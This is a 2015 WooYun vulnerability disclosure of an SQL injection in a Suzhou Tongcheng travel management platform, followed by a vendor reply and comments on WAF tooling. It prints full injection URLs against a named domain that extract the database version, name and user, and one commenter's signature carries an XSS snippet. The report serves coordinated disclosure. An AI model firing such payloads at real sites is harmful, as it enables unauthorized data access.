当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106658

漏洞标题:苏州同程某管理平台存在boolean-based blind注入漏洞(附手工检测)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: Mr.leo

提交时间:2015-04-09 09:42

修复时间:2015-04-09 15:29

公开时间:2015-04-09 15:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

苏州同程某管理平台存在boolean-based blind注入漏洞(附手工检测)

详细说明:

http://test1.www.51zfx.net/newadmin/Distributor/Login.aspx 苏州同程旅游管理平台V8.1
注入参数:includestartdate
注入点:
/Reception.aspx?days=&days2=&fee2=&includestartdate=pUaHwnCN
/ReceptionDJ.aspx?days=&days2=&fee2=&includestartdate=mYLmDd5I

11111.png


手工测试:(可以获取当前数据库名,用户,版本)
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=2015-04-08'+and+1=@@version--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=db_name%28%29--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=user--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22

123.png


456.png


789.png

漏洞证明:

已经证明

修复方案:

过滤参数

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-09 10:01

厂商回复:

感谢关注同程旅游,内部报过了,唉...

最新状态:

2015-04-09:已修复,测试站点未走软WAF,已下线。随手找了一个走软WAF的贴在评论里了,欢迎测试。

漏洞评价:

评论

  1. 2015-04-09 15:29 | 苏州同程旅游网络科技有限公司(乌云厂商)

    http://45579.51zfx.net/

  2. 2015-04-09 15:31 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    这明明是error-based sqli

  3. 2015-04-09 15:32 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @苏州同程旅游网络科技有限公司 给力啊!!

  4. 2015-04-09 15:36 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @f4ckbaidu 好吧

  5. 2015-04-09 15:48 | 九零奶嘴 ( 路人 | Rank:8 漏洞数:4 | 小菜比)

    0.0

  6. 2015-04-09 16:09 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @Mr.leo 看到拦截日志里Netsparker一顿猛扫啊

  7. 2015-04-09 16:12 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @苏州同程旅游网络科技有限公司 很有成就感把

  8. 2015-04-09 16:57 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    @苏州同程旅游网络科技有限公司 感觉你们公司内部报过好多,都是没处理的

  9. 2015-04-09 18:21 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @静默 系统太多,有些报了之后我忘记跟了,有些部门不踢不走的。

  10. 2015-04-09 19:03 | JGHOOluwa ( 普通白帽子 | Rank:206 漏洞数:32 | 就是来看看大牛们如何超神的^-^)

    路过,表示http://45579.51zfx.net/为什么管理员入口的密码输入进行了混淆,而合伙伙伴入口处就没有~~

  11. 2015-04-09 19:24 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    好厂商,鉴定完毕!

  12. 2015-04-10 00:10 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    厂商态度好。

  13. 2015-04-10 10:53 | 孤独行者 ( 普通白帽子 | Rank:110 漏洞数:44 | 时光如水,总是无言。你若安好,便是晴天)

    @苏州同程旅游网络科技有限公司 那就一直踢咯。。

  14. 2015-04-10 10:55 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    @苏州同程旅游网络科技有限公司 怪不得

  15. 2015-04-10 11:14 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    @苏州同程旅游网络科技有限公司 大牛,请教下那么大的公司用神马系统监控数据流,买的SOC还是自己用开源软件做的日志分析系统?

  16. 2015-04-10 14:05 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @f4ckbaidu 哥,我是弱菜。之前看到opensoc 但是看硬件投入貌似比较大,感觉我一个人也搞不,它也只是提供了个框架。现在只是简单的用ELK(elasticsearch logstash kibana)监控下部分走软WAF(基于naxsi)的日志,完全没有什么高大上的大数据分析、统计建模、异常分析引擎啥的。这边刚起步,我也没相关经验,慢慢来吧。

  17. 2015-04-10 14:22 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    @苏州同程旅游网络科技有限公司 期待大牛日后能分享下这方面的经验,能在drops里投稿最好啦,谢谢

  18. 2015-04-10 16:06 | xxyyzz ( 实习白帽子 | Rank:57 漏洞数:6 | 123456)

    @苏州同程旅游网络科技有限公司 naxsi是不是性能比modsecurity好?大神

  19. 2015-04-11 14:20 | ihacku ( 普通白帽子 | Rank:100 漏洞数:33 | 同程旅游安全工程师。找大神带节奏,邮箱 s...)

    @xxyyzz 没实际对比过,但是这里软WAF是部署在虚拟机上的,之前有几次网卡流量都跑满过,所以naxsi性能肯定是没问题的。naxsi的问题在于如果不用白名单机制,默认的规则误拦太严重,拦截能力也不够。最新的RC版本集成了libinjection(modsecurity据说在用),拦截能力应该有很大提升。

  20. 2015-04-11 17:37 | keny ( 实习白帽子 | Rank:50 漏洞数:21 )

    小菜默默路过...

  21. 2015-04-13 10:36 | ToySweet ( 实习白帽子 | Rank:36 漏洞数:8 | 做有道德的安全研究员。)

    报错注入。。。